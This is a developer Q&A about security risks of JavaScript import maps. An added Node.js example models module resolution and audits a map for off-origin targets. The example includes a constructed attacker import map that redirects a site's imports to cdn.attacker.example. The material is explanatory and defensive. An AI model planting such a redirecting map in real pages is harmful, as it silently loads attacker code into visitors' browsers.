What are the security issues with JavaScript's Import Maps?


When I look at MDN Import Maps, I see a possible breach of security.

I consider this scenario: someone uses a JS library from any open source git repository which uses an import. Now someone comes along and hijacks either your local code or the open source repository. At least he is able to sneak in a little custom import map, which bends the imports to an external malicious source.

Is this scenario feasible and could we do anything about it?

I reckon using an empty <script type="importmap"></script>, since there is only one import map allowed per document.

Edit:

To elaborate more on a possible exploitation scenario:

Consider yourself a non-security-expert web developer (let's call her Alice), who uses some frontend framework. She downloads some library to her web server and imports it with an import command in JS. Now some malicious creature (let's call him Bob) hacks Alice's repo and sneakily adds an import map to her HTML code, which bends the local library to an external one. Alice might never ever notice something's wrong here.

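The scenario above, as an added example that is not part of the original question or answer: a small Node.js model of how a browser resolves a module specifier through an import map (keys and targets are normalized to URLs, exact match before longest "/"-prefix match, scopes before top-level imports), followed by a check that lists every mapping whose target is not on the page's own origin. The page URL, module paths and the attacker's host (alice.example, cdn.attacker.example) are constructed, and the resolution logic is a simplified rendering of the HTML spec algorithm (invalid entries are skipped rather than reported).

```javascript
// Added example, not code from the original question or answer. Models browser
// import-map resolution and audits a map for off-origin targets. All URLs below
// are constructed for the demo.

// Normalize a specifier or map key: URL-like strings ("./", "../", "/" or an
// absolute URL) become absolute URLs; anything else stays a bare specifier.
function normalizeSpecifier(specifier, baseURL) {
  if (/^(\.\.?\/|\/)/.test(specifier)) return new URL(specifier, baseURL).href;
  try { return new URL(specifier).href; } catch { return specifier; }
}

// A target must parse as a URL; a bare string target is invalid and dropped.
function normalizeTarget(target, baseURL) {
  if (typeof target !== "string") return null;
  try {
    return /^(\.\.?\/|\/)/.test(target) ? new URL(target, baseURL).href : new URL(target).href;
  } catch { return null; }
}

// Build one normalized specifier map, keys sorted longest first so the most
// specific "/"-prefix key wins during prefix matching.
function normalizeModuleMap(obj, baseURL) {
  const entries = [];
  for (const [key, target] of Object.entries(obj || {})) {
    const k = normalizeSpecifier(key, baseURL);
    const t = normalizeTarget(target, baseURL);
    if (k.endsWith("/") && !(t && t.endsWith("/"))) continue; // prefix key needs a prefix target
    entries.push([k, t]);
  }
  entries.sort((a, b) => b[0].length - a[0].length);
  return new Map(entries);
}

// Parse the JSON of a <script type="importmap"> against the document base URL.
function parseImportMap(json, baseURL) {
  const raw = JSON.parse(json);
  const scopes = Object.entries(raw.scopes || {})
    .map(([scopeKey, mapping]) => [new URL(scopeKey, baseURL).href, normalizeModuleMap(mapping, baseURL)])
    .sort((a, b) => b[0].length - a[0].length);
  return { imports: normalizeModuleMap(raw.imports, baseURL), scopes: new Map(scopes) };
}

// Look a normalized specifier up in one map: exact key first, then prefix key.
function resolveInMap(normalized, moduleMap) {
  if (moduleMap.has(normalized)) return moduleMap.get(normalized);
  for (const [key, target] of moduleMap) {
    if (key.endsWith("/") && normalized.startsWith(key) && target) {
      return new URL(normalized.slice(key.length), target).href;
    }
  }
  return null;
}

// What the browser does for `import "<specifier>"` issued from module referrerURL.
function resolveModuleSpecifier(specifier, referrerURL, importMap) {
  const normalized = normalizeSpecifier(specifier, referrerURL);
  for (const [scope, moduleMap] of importMap.scopes) {
    const inScope = referrerURL === scope || (scope.endsWith("/") && referrerURL.startsWith(scope));
    if (!inScope) continue;
    const hit = resolveInMap(normalized, moduleMap);
    if (hit) return hit;
  }
  const hit = resolveInMap(normalized, importMap.imports);
  if (hit) return hit;
  try { return new URL(normalized).href; } catch {
    throw new TypeError(`bare specifier "${specifier}" is not mapped`);
  }
}

// The check: every mapping whose target lives on a different origin than the page.
function auditImportMap(importMap, pageURL) {
  const pageOrigin = new URL(pageURL).origin;
  const findings = [];
  const scan = (scope, moduleMap) => {
    for (const [key, target] of moduleMap) {
      if (target && new URL(target).origin !== pageOrigin) findings.push({ scope, key, target });
    }
  };
  scan(null, importMap.imports);
  for (const [scope, moduleMap] of importMap.scopes) scan(scope, moduleMap);
  return findings;
}

// --- Constructed scenario: Alice's site and the map Bob slips into her HTML ---
const PAGE_URL = "https://alice.example/app/index.html";     // Alice's page
const MAIN_JS = "https://alice.example/app/main.js";         // contains: import "./vendor/lib.js"
const ADMIN_JS = "https://alice.example/app/admin/panel.js"; // contains: import "lodash"

// The first key is Alice's *relative* path, so her unchanged import now fetches
// from Bob's host; the "lodash" entry is a legitimate same-origin mapping that
// a scope quietly overrides for admin pages only.
const BOBS_MAP = JSON.stringify({
  imports: { "./vendor/lib.js": "https://cdn.attacker.example/lib.js", "lodash": "/app/vendor/lodash.js" },
  scopes: { "/app/admin/": { "lodash": "https://cdn.attacker.example/lodash.js" } },
});

function demo() {
  const noMap = parseImportMap("{}", PAGE_URL);
  const bobsMap = parseImportMap(BOBS_MAP, PAGE_URL);
  return {
    libWithoutMap: resolveModuleSpecifier("./vendor/lib.js", MAIN_JS, noMap),
    libWithBobsMap: resolveModuleSpecifier("./vendor/lib.js", MAIN_JS, bobsMap),
    lodashFromMain: resolveModuleSpecifier("lodash", MAIN_JS, bobsMap),
    lodashFromAdmin: resolveModuleSpecifier("lodash", ADMIN_JS, bobsMap),
    findings: auditImportMap(bobsMap, PAGE_URL),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Two things worth noting from running it. Alice's main.js is byte-for-byte unchanged, yet its relative import now resolves to cdn.attacker.example, which is exactly the invisibility the question worries about; a CI step that extracts the page's import map and runs something like auditImportMap on it would have flagged both entries. Separately, a Content-Security-Policy of `script-src 'self'` makes the browser refuse to fetch the remapped module from the foreign origin, so the redirected import fails loudly instead of silently executing Bob's code.
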
Answer by Thomas

If someone can hijack your local code, they can inject any code in the page already, so they don't need an import map.

If your page is loading code from an external domain which gets compromised, the attacker can also inject any code, and again does not need an import map. Do not load code from domains you don't trust.